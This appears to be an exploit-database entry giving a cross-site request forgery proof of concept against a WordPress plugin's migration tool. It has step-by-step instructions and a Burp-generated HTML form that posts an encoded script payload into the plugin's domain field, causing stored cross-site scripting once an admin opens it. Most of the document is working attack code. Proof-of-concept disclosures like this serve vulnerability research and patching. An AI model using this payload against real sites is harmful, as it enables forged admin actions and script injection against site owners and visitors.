Share
## https://sploitus.com/exploit?id=WPEX-ID:1D4A2F0E-A371-4E27-98DE-528E070F41B0
1. Login as Admin.
2. Open the .html file in the same browser session.
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.28.128.6/wordpress/wp-admin/tools.php?page=hw_migration_simple" method="POST">
      <input type="hidden" name="old&#95;domain" value="&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="new&#95;domain" value="http&#58;&#47;&#47;qwer&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```
3. XSS will be triggered.